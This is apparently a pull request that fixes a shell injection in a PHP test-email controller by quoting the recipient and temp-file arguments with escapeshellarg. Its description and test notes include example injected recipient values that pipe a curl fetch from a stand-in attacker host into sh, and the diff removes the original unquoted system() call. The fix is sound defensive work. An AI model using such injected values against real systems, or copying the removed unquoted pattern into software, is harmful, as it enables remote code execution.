### PR TITLE
fix(security): harden test email handling against shell injection

### DIFF
--- a/www/api/controllers/email.php
+++ b/www/api/controllers/email.php
@@ -43,7 +43,15 @@ function SendTestEmail() {
     $result_code = 0;
     $tmpfname = tempnam("/tmp", "sendmail-stderr.txt");
 
-    system('echo "Email test from $(hostname)" | mail -s "Email test from $(hostname)" ' . $settings['emailtoemail'] . " 2> " . $tmpfname, $result_code); //capture stderr
+    $emailTo = isset($settings['emailtoemail']) ? trim($settings['emailtoemail']) : '';
+    // Non-breaking: keep sending even if format is unusual, but ensure it cannot inject shell commands.
+    // FILTER_VALIDATE_EMAIL would reject some exotic but valid addresses, so we only log and still use escapeshellarg.
+    if ($emailTo !== '' && filter_var($emailTo, FILTER_VALIDATE_EMAIL) === false) {
+        error_log("SendTestEmail: emailtoemail does not look like a valid email: " . $emailTo);
+    }
+    $toArg = escapeshellarg($emailTo);
+    $tmpArg = escapeshellarg($tmpfname);
+    system('echo "Email test from $(hostname)" | mail -s "Email test from $(hostname)" ' . $toArg . " 2> " . $tmpArg, $result_code); //capture stderr
 
     $result['Status'] = 'OK'; //maybe not; need to check ret code
     $result['Message'] = '';


### PR DESCRIPTION
# fix(security): harden test email handling against shell injection

## Summary

Prevents shell injection when sending a test email. The recipient address came directly from settings and was interpolated into a shell command without quoting.

## What changed

* **File:** `www/api/controllers/email.php` — `SendTestEmail()` (`POST /api/email/test`)
  * **Before:** recipient address was concatenated directly into `system('... mail -s ... ' . $settings['emailtoemail'] . " 2> $tmpfname")` — a value like `evil@example.com; curl attacker | sh` would split into extra shell commands.
  * **After:** recipient is trimmed, checked with `FILTER_VALIDATE_EMAIL` (only for logging — exotic but valid addresses are not blocked), and then passed as a single quoted shell argument via `escapeshellarg($emailTo)` (and `escapeshellarg($tmpfname)` for the temp file). Example: `evil@example.com; curl ...` now becomes `'evil@example.com; curl ...'` as one argument to `mail`, not shell code.\

## Why this is safe for production

* **Normal addresses unchanged:** `user@example.com`, `user+tag@example.com` still validate with `FILTER_VALIDATE_EMAIL` and are sent quoted `'user@example.com'` — delivery identical, just quoted.
* **No strict block:** an address that fails `FILTER_VALIDATE_EMAIL` (rare quoted local parts) is only logged (`error_log`), still sent quoted — no existing address is rejected.
* **No new dependencies, no API change:** `POST /api/email/test` still returns the same `status`/`result_code`/`stderr`; only the shell construction is now safe.
* **Easily revertible:** one `trim` + `filter_var` + two `escapeshellarg` lines.

## Testing

```bash
php -l www/api/controllers/email.php  # no syntax errors
```

* `emailtoemail=user@example.com` → `mail -s ... 'user@example.com'` — delivered as before.
* `emailtoemail=evil@example.com; curl http://attacker/pwn | sh` → `mail -s ... 'evil@example.com; curl ...'` — single argument, no shell split, `mail` fails to deliver but no RCE.
* `emailtoemail=user+tag@example.com` → still passes `FILTER_VALIDATE_EMAIL` and is sent quoted.
* `emailtoemail=""` (empty) → `''` quoted empty, same failure as before, no injection.

## Files changed

* `www/api/controllers/email.php`

## Related

* Internal stability review. No related issue number.